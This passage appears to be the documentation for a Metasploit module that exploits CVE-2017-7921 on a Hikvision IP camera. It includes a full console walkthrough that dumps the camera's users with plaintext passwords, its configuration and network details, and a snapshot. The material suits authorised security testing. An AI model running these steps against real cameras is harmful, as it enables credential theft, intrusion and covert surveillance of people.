- [ ] `set PRINT true`
- [ ] `set ACTION Automatic`
- [ ] `run`

 You should get a full disclosure of all camera information supported by this module.

Specific Hardware Examples:
This module has been tested against a Hikvision camera with the specifications listed below:

* MANUFACTURER: Hikvision.China
* MODEL: DS-2CD2142FWD-IS
* FIRMWARE VERSION: V5.4.1
* FIRMWARE RELEASE: build 160525
* BOOT VERSION: V1.3.4
* BOOT RELEASE: 100316

## Options
### PRINT
This option allows you print all information collected to the console during execution except for camera snapshots.

## Actions
### Automatic
Retrieves all information supported by this module
### Configuration
Retrieves the camera hardware and software configuration
### Credentials
Retrieves all configured users including the passwords in plain text format and stores them in the database.
This can be checked by using the command `creds -O <target IP>` at the Metasploit prompt.
### Snapshot
Takes a camera snapshot and stores it as a JPEG file in loot.

All information disclosed is by default stored in loot

## Scenarios

### Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
```
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
ACTION => Automatic
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
PRINT => true
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options

Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PRINT    true             no        Print output to console (not applicable for snapshot)
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met>
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Auxiliary action:

   Name       Description
   ----       -----------
   Automatic  Dump all information


msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
[*] Running module against 192.168.100.180

[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
Username:admln | ID:2 | Role:Operator | Password: asdf1234

[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_0492>
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS2016HS7777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0

Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.180
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8

Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL

[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision>
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.>
[*] Auxiliary module execution completed

msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
Credentials
===========

host             origin           service        public  private   realm  private_type  JtR Format
----             ------           -------        ------  -------   -----  ------------  ----------
192.168.100.180  192.168.100.180  80/tcp (http)  admln   asdf1234         Password
192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password

msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
```

## Limitations
No limitations are identified so far using this module.
